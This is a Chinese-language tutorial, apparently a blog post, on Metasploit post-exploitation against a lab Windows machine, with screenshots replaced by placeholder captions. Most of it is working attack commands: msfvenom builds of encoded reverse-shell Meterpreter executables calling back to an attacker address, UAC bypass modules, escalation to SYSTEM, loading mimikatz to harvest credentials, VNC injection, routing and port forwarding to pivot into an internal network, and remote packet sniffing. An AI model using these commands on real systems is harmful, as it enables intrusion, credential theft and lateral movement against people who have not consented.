metasplort後滲透模塊介紹

1. 獲取sesson
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp Lhost=192.168.48.129 LPORT=9999 -b “\00” -e x86/shikata_ga_nai -f exe -o ss.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 9999
set lhost 0.0.0.0
在這裏插入圖片描述
目標靶機運行執行腳本
在這裏插入圖片描述
getsystem失敗–因爲UAC對我們的命令做了限制
在這裏插入圖片描述
2. 使用UACpypass,提升session權限
use exploit/windows/local/ask
set session 1
set filename 360up.exe
在這裏插入圖片描述
在這裏插入圖片描述

3. 使用UACpypass第二種方法,客戶端無感知
use exploit/windows/local/bypassuac
在這裏插入圖片描述
在這裏插入圖片描述

4. 製作一個64位的payload讓目標靶機執行
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp Lhost=192.168.48.129 LPORT=9999 -f exe -o sss.exe
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述

meterpreter > getsystem
…got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load mimikatz
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述
在這裏插入圖片描述

7. 自動發現可利用的漏洞
use post/multi/recon/local_exploit_suggester
在這裏插入圖片描述
8. 使用vnc payload 進行圖形化界面查看或者控制
use exploit/windows/local/bypassuac_injection
set payload windows/x64/vncinject/reverse_tcp
在這裏插入圖片描述

9. 試利用現有的漏洞對內網進行攻擊
1).建立session路由,讓我們能夠訪問對端網絡
route add 192.168.100.0 255.255.255.0 5
2).做端口映射(netstart -an|more)
session 5
portfwd add -l 445 -r 127.0.0.1 -p 445
-l 在kali上監聽的端口
-r 目標IP,可以是對端本機(127.0.0.1),或者是對端可以訪問到的任何IP
-p 目標端口
msf --> kali(445)—> 靶機(跳板) ----> 目標ip:端口
meterpreter>portfwd
10. 遠程抓包
遠程截圖
在這裏插入圖片描述
在這裏插入圖片描述

抓包(meterpreter)
load sniffer
?
在這裏插入圖片描述
sniffer_interfaces
在這裏插入圖片描述
sniffer_start 2
在這裏插入圖片描述
sniffer_dump 2 1.cap
在這裏插入圖片描述
use auxiliary/sniffer/psnuffle
在這裏插入圖片描述
在這裏插入圖片描述
在內存中緩存區塊循環存儲抓包(50000包),不寫硬盤
智能過濾meterpreter流量,傳輸全程使用SSL/TLS加密
解碼
set PCAPFILE 1. cap

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章